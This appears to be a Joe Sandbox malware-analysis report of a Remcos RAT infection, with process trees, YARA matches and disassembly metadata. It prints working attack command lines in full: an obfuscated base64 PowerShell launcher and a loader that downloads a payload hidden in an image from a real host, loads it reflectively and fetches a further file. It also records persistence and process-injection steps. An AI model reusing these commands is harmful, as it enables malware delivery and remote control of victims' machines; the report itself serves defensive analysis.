QBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreRgBEDgTreFEDgTreVwDgTrevDgTreDQDgTreNDgTreDgTrexDgTreC8DgTreNQDgTre3DgTreC4DgTreMDgTreDgTre2DgTreC4DgTreNQDgTre5DgTreC4DgTreMwDgTreyDgTreC8DgTreLwDgTre6DgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreDEDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreEMDgTreOgBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreRDgTreBhDgTreHQDgTreYQBcDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBXDgTreFEDgTreUQDgTrenDgTreCwDgTreJwBSDgTreGUDgTreZwBBDgTreHMDgTrebQDgTrenDgTreCwDgTreJwDgTrenDgTreCkDgTreKQB9DgTreCDgTreDgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x1320000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	11:36:01
Start date:	20/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.FDQW/441/57.06.59.32//:ptth' , '1' , 'C:\ProgramData\' , 'WQQ','RegAsm',''))} }"
Imagebase:	0x1320000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.382499604.0000000004497000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	11:36:10
Start date:	20/04/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\WQQ.vbs
Imagebase:	0x1320000
File size:	427'008 bytes
MD5 hash:	EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:36:12
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x12d0000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	11:36:12
Start date:	20/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x12d0000
File size:	64'704 bytes
MD5 hash:	8FE9545E9F72E460723F484C304314AD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.865606868.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.865035522.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	11:36:20
Start date:	20/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs"
Imagebase:	0xff400000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:36:31
Start date:	20/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\ProgramData\WQQ.vbs"
Imagebase:	0xff150000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Disassembly

Reset < >

Analysis Process: EQNEDT32.EXEPID: 1732, Parent PID: 564COMMON

Execution Graph

Execution Coverage:	25.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	62.5%
Total number of Nodes:	104
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 0366047A Relevance: 6.1, APIs: 4, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(0366046C), ref: 0366047A

Part of subcall function 03660494: URLDownloadToFileW.URLMON(00000000,036604A5,?,00000000,00000000), ref: 03660507
Part of subcall function 03660494: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03660545
Part of subcall function 03660494: ExitProcess.KERNEL32(00000000), ref: 0366055D

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileLibraryLoadProcessShell
String ID:
API String ID: 2508257586-0
Opcode ID: 427543635cdb7cb43cc3db07854a2bc7d4e18e3711e6c1bddcaf347ed9fcc3cd
Instruction ID: 0ae1500acb86245c925aedf061b8dfe12d2a70956e9aac82596ffaccc5c166e5
Opcode Fuzzy Hash: 427543635cdb7cb43cc3db07854a2bc7d4e18e3711e6c1bddcaf347ed9fcc3cd
Instruction Fuzzy Hash: 463178A284C3C16FDB22D3304E7EB66BF646F62144F5D8ADED1C20A4E3E7989501C666

Uniqueness

Uniqueness Score: -1.00%

Function 036603EA Relevance: 4.7, APIs: 3, Instructions: 155
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,036604A5,?,00000000,00000000), ref: 03660507
ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03660545
ExitProcess.KERNEL32(00000000), ref: 0366055D

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 7d9395e354aabb98f39a03877954ae4afeec9997ce6a41cca6ef0c6307fd914c
Instruction ID: 1b5232727df65ad5e0c5e451a355a7677e706a58790129298a9996952e065be1
Opcode Fuzzy Hash: 7d9395e354aabb98f39a03877954ae4afeec9997ce6a41cca6ef0c6307fd914c
Instruction Fuzzy Hash: 9251A9A684D3C15FD722D7304E7EA66BF646F23140B0CCADED0D60A4E3E798A505C36A

Uniqueness

Uniqueness Score: -1.00%

Function 03660494 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 7b076ecb7bd852e83826094b5c65193fd66323753ad3d43f4312b7ef9ec0b935
Instruction ID: 48bb7d71f13449dae0dc053aab050fab04b2cbc4f89ee3147dfe680380531628
Opcode Fuzzy Hash: 7b076ecb7bd852e83826094b5c65193fd66323753ad3d43f4312b7ef9ec0b935
Instruction Fuzzy Hash: 162133A294C3C15FDB22D3304D7EB66BF606F62540F5D8ADE91860A8E3E6989401C656

Uniqueness

Uniqueness Score: -1.00%

Function 03660505 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,036604A5,?,00000000,00000000), ref: 03660507

Part of subcall function 0366051E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03660545
Part of subcall function 0366051E: ExitProcess.KERNEL32(00000000), ref: 0366055D

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: DownloadExecuteExitFileProcessShell
String ID:
API String ID: 3584569557-0
Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction ID: 28d25dcff4b5c23590bb58c4fce0d2493785e98ba34082ba8e6ed56fb428bb27
Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
Instruction Fuzzy Hash: E4F027E468C38429EA12E7784E7EF6A6E149F91780F1408EDF1415D0D3E5C08904C22E

Uniqueness

Uniqueness Score: -1.00%

Function 03660533 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03660545

Part of subcall function 03660558: ExitProcess.KERNEL32(00000000), ref: 0366055D

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction ID: eb01c0239d6b6850fcfbd20ee47158936b328c686e64af622e26eb77a786fb20
Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
Instruction Fuzzy Hash: 920144D8A4C34222DB30F6288B35BBAAB50EB517C0FCC987BA981181C2D59495C3862E

Uniqueness

Uniqueness Score: -1.00%

Function 0366051E Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: ExecuteExitProcessShell
String ID:
API String ID: 1124553745-0
Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction ID: 732d4ba008d291518ef37529c9dc1f81ba9d10d6b67d1421561e36e5cbc0e2e6
Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
Instruction Fuzzy Hash: 9A01F4E465D34121E761E2684FB9BAAAA85EB917C4FA8847EF191080C2D2948943C62E

Uniqueness

Uniqueness Score: -1.00%

Function 03660558 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 0366055D

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0366055F Relevance: .0, Instructions: 14
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000002.00000002.352128356.0000000003660000.00000004.00000020.00020000.00000000.sdmp, Offset: 03660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_3660000_EQNEDT32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction ID: c6b0088f865513e1cf1e5b90e80730697e9b1638981bf771e844e54a72d2f55a
Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
Instruction Fuzzy Hash: BDD05E71211502DFC304DB04CA50E16F36AFFC4650B28C668D4004B719C330E891CAA4

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3180, Parent PID: 3088COMMON

Executed Functions

Function 0021D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.487309515.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_21d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5061a1fcf8aeb5c735d1a40c708ba28e35e3cab791c1c732a2c0491fe29801e7
Instruction ID: 7cdbbb34a67221d664beda3cfd16ae3c2fb5562d8666594bee74f52212636553
Opcode Fuzzy Hash: 5061a1fcf8aeb5c735d1a40c708ba28e35e3cab791c1c732a2c0491fe29801e7
Instruction Fuzzy Hash: 2D01A771514340EBE7104E19C8C4BA7BFD8DF55724F18851AED454B286C6B9D885C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0021D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.487309515.000000000021D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0021D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_21d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14654ddfee66d97218d30bccb9333e6c1f1be8a1bcd398b8cc1463af685e7647
Instruction ID: 6504393931b2960806c29ed73b286320f1ac7ffa8eca2371d98f744255f843df
Opcode Fuzzy Hash: 14654ddfee66d97218d30bccb9333e6c1f1be8a1bcd398b8cc1463af685e7647
Instruction Fuzzy Hash: 4FF06271804344AFE7108E1ACCC4BA7FFD8EB55724F18C55AED484E286C2799C84CAB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 3272, Parent PID: 3180COMMON

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.7%
Total number of Nodes:	24
Total number of Limit Nodes:	2

Executed Functions

Function 002654A0 Relevance: 16.9, Strings: 13, Instructions: 675
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

*!, xrefs: 00265894
*!, xrefs: 00265DA8
*!, xrefs: 00265930
*!, xrefs: 00265F42
*!, xrefs: 002656DC
*!, xrefs: 00265B22
*!, xrefs: 00265CC4
(, xrefs: 00265D58
*!, xrefs: 00265A93
*!, xrefs: 00265EBE
*!, xrefs: 00265810
*!, xrefs: 002659CF
*!, xrefs: 00265FBF

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID:
String ID: ($*!$*!$*!$*!$*!$*!$*!$*!$*!$*!$*!$*!
API String ID: 0-751007061
Opcode ID: e62246ca01d996878849054ca92e289321f874a15b20554abec3ca70dd29963e
Instruction ID: e468646cd32bb1cc53378af2c20c9d31f42b64cc1aa7b342be2bc32e57f3a3b6
Opcode Fuzzy Hash: e62246ca01d996878849054ca92e289321f874a15b20554abec3ca70dd29963e
Instruction Fuzzy Hash: 3D62B074A11229DFDB69DF68C894BEDB7B2BB89304F1481EAD409A7291DB305EC5CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00265130 Relevance: .5, Instructions: 523
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 903eb8c1d4979f9b65ff16b8bb69971c2fdea30dc5353c59015377e49b3edb23
Instruction ID: e59b4044c63810a64a90528a608ff2030cc35357f240e63d0a9d24f86a04e7a5
Opcode Fuzzy Hash: 903eb8c1d4979f9b65ff16b8bb69971c2fdea30dc5353c59015377e49b3edb23
Instruction Fuzzy Hash: 5BB1487190A3948FDB17DB3998606D97FB1AF4B311F0981E7C488DB2A3D6384D89CB21

Uniqueness

Uniqueness Score: -1.00%

Function 003D0F3F Relevance: 11.4, Strings: 9, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

D<., xrefs: 003D0FFF
D<., xrefs: 003D0F9A
4'p, xrefs: 003D10F7
$p, xrefs: 003D1061
4'p, xrefs: 003D1103
$p, xrefs: 003D1019
$p, xrefs: 003D1055
D<., xrefs: 003D103B
D<., xrefs: 003D10B7

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$D<.$D<.$D<.$D<.$$p$$p$$p
API String ID: 0-1803574495
Opcode ID: 385800feed68c5b4044b373568fee0f3bf1bf26fb1b4667aa4443b7c5df6746a
Instruction ID: f90bc0fc5e3503f69c9317e76843daeb4c8b70215f53f7f288a4f93d1982fc44
Opcode Fuzzy Hash: 385800feed68c5b4044b373568fee0f3bf1bf26fb1b4667aa4443b7c5df6746a
Instruction Fuzzy Hash: 9D514736700201AFCF2E6679B41077BBBAA9B85710F34847BD9518B382DE72CD91C362

Uniqueness

Uniqueness Score: -1.00%

Function 003D1855 Relevance: 8.9, Strings: 7, Instructions: 178
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@=., xrefs: 003D18DB
4'p, xrefs: 003D1A03
4'p, xrefs: 003D1A0F
@=., xrefs: 003D19BA
tPp, xrefs: 003D1975
tPp, xrefs: 003D1981
@=., xrefs: 003D195B

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p$@=.$@=.$@=.$tPp$tPp
API String ID: 0-6690078
Opcode ID: 6818aeb5e0b9199c470bcc3a6a335bd676f99e83a81ba2134fb58789b0b86451
Instruction ID: dedaaee4810a04a4225eb972a989ef151cd5f1a9a1f37c8554033d7496c4c6cc
Opcode Fuzzy Hash: 6818aeb5e0b9199c470bcc3a6a335bd676f99e83a81ba2134fb58789b0b86451
Instruction Fuzzy Hash: C251B336B01200AFCB1A9A68A46477EBBE6AFC8310F29C0ABD5558B395CE71CD41D791

Uniqueness

Uniqueness Score: -1.00%

Function 003D2BCC Relevance: 5.1, Strings: 4, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(op, xrefs: 003D2CA6
$& , xrefs: 003D2C6D
$& , xrefs: 003D2C7A
(op, xrefs: 003D2C96

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: $& $$& $(op$(op
API String ID: 0-2288490313
Opcode ID: 9dd01523ef7035a1fa7a1cddd1d2333e8b569a85b2d5d5885b5a97083f650568
Instruction ID: 0629f4f684e01b9e0b876791324e3c58246a7a36d98223bc6543525b64c01df6
Opcode Fuzzy Hash: 9dd01523ef7035a1fa7a1cddd1d2333e8b569a85b2d5d5885b5a97083f650568
Instruction Fuzzy Hash: C2410636B04245DFCB1B8F68E444BAFBBA2AFA5310F24846BD4658B391CB71CD95CB41

Uniqueness

Uniqueness Score: -1.00%

Function 003D106F Relevance: 5.0, Strings: 4, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 003D10F7
$p, xrefs: 003D1090
D<., xrefs: 003D10B7
D<., xrefs: 003D1078

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$D<.$D<.$$p
API String ID: 0-2799195521
Opcode ID: dae462668eea901eac5bd625ed9992ddbbf43c449486d3835756d3fa830b4159
Instruction ID: a55c9ad128a5656b9088757fc80fdbafc7111861a2d029fa868e68b7581b6460
Opcode Fuzzy Hash: dae462668eea901eac5bd625ed9992ddbbf43c449486d3835756d3fa830b4159
Instruction Fuzzy Hash: 90012672700104FFCF2AB265B81062EB766AB8C751F208127EE156B346CE36CC52C751

Uniqueness

Uniqueness Score: -1.00%

Function 003D270F Relevance: 2.5, Strings: 2, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'p, xrefs: 003D273E
4'p, xrefs: 003D2732

Memory Dump Source

Source File: 00000008.00000002.382091528.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3d0000_powershell.jbxd

Similarity

API ID:
String ID: 4'p$4'p
API String ID: 0-3973980265
Opcode ID: b4dee08a471f673469045b2a0ff782698c7dd60f54bf9335533d5a173ae2bb5c
Instruction ID: 3800fff2189c0f63e2fa78f5989b6e4221066a4312e0a1eec7dc7659f69fb050
Opcode Fuzzy Hash: b4dee08a471f673469045b2a0ff782698c7dd60f54bf9335533d5a173ae2bb5c
Instruction Fuzzy Hash: E1E0D833B043449ACB2A6674A4217EE7BA16FE2250F65809BC48086357CA248D16C352

Uniqueness

Uniqueness Score: -1.00%

Function 00268BC8 Relevance: 1.8, APIs: 1, Instructions: 315
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00268E8F

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 23845e807c7eb42fd015a446d2792872e84035779683c8d83669563942db88b7
Instruction ID: aff4435ace25bb09ec39bc356f6c7294cc5085b885d10a08e3390b614dca1513
Opcode Fuzzy Hash: 23845e807c7eb42fd015a446d2792872e84035779683c8d83669563942db88b7
Instruction Fuzzy Hash: 2EC12670D102198FDF24CFA8C841BEDBBB1BF49300F0092AAD959B7294DB749A95CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00268830 Relevance: 1.6, APIs: 1, Instructions: 118
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00268903

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: eb1462f7f8717344f1f40989d1ed5a67700d989e2680371cc43ebf00651239f0
Instruction ID: a79fa3dcf47edd009d61a5441489be49979c91b42ffaaff064b71c809dde2b9c
Opcode Fuzzy Hash: eb1462f7f8717344f1f40989d1ed5a67700d989e2680371cc43ebf00651239f0
Instruction Fuzzy Hash: 1041AAB4D012489FCF00CFA9D984AEEFBF1BB49314F24942AE814B7250D735AA55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002685D1 Relevance: 1.6, APIs: 1, Instructions: 99
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00268687

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 26a6a09ebc2928fe074d194ccf59b88938248e8b328f949c8368a7989c4fa838
Instruction ID: 8f875250678e40e83db12f494902e2cb12cbc94b144b028edc8fa504be11d6e2
Opcode Fuzzy Hash: 26a6a09ebc2928fe074d194ccf59b88938248e8b328f949c8368a7989c4fa838
Instruction Fuzzy Hash: 5B41CBB4D002489FCF10CFA9D884AEEFBB1BF49314F24802AE418B7240C778A989CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002685D8 Relevance: 1.6, APIs: 1, Instructions: 96
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 00268687

Memory Dump Source

Source File: 00000008.00000002.382007162.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a4fb18caa7775ab03e8d944fb2d9d5349bc8d1fbfbd88ca83fb7e1e4c7f58880
Instruction ID: b4927354bff0acac120f1fd94366f4b687415b8f3cf895bf8ff049587f4682d1
Opcode Fuzzy Hash: a4fb18caa7775ab03e8d944fb2d9d5349bc8d1fbfbd88ca83fb7e1e4c7f58880
